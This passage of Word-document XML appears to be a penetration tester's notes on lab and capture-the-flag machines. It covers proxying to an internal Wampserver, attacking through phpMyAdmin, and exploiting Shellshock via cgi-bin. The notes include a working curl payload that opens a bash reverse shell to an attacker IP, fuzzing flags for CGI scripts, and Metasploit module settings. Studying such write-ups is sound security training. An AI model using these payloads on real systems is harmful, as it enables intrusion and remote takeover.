                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1056"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2337242" cy="3005026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003006">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the Proxies Tab and press the Add button.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003007">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4157663" cy="553022"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="231" name="image229.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image229.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1057"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4157663" cy="553022"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003008">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill in Title, Type, Hostname (IP address), Port, and then Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003009">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4996020" cy="1445233"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73" name="image59.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image59.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1058"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4996020" cy="1445233"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can select it from the available proxies like you would Burp Suite and navigate to the discovered open port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can select it from the available proxies like you would Burp Suite and navigate to the discovered open port 8080, where we see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wampserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2298700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="572" name="image559.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image559.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1059"/>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300D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At the bottom we see some goodies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="218" name="image206.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image206.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1060"/>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300F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003010">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack vector ended up being </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpmyadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003011">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301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14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003015">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mecplbj2x5q6" w:id="424"/>
      <w:bookmarkEnd w:id="424"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellshock/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bashbug</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CGI-Bin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003016">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003017">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2014-6271</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003019">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote code execution vulnerability in Bash when invoked through Apache CGI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen on </w:t>
      </w:r>
      <w:hyperlink r:id="rId1061">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sumo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used Nikito and saw that it was vulnerable to ShellShock. Specifically, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was. So they ran this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -H "user-agent: () { :; }; /bin/bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.45.177/443</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1" \</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.234.87/cgi-bin/test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1454"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Feel free to change </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003022">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003023">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example from a while ago that was from HTB and involves a file within /cgi-bin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003025">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in URL enumeration, do another web enumeration but only for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and use the following flags TO FIND SOME SCRIPT. We find a script since we hope it invokes GNU Bash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003026">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .cgi,.sh,.pl,.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003027">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for ffuf. If you use GoBuster, use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003028">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003029">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once you find a SCRIPT, use the metasploit module: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/http/apache_mod_cgi_bash_env_exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHost [local_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS [set target IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set TARGETURI [path to script without the IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
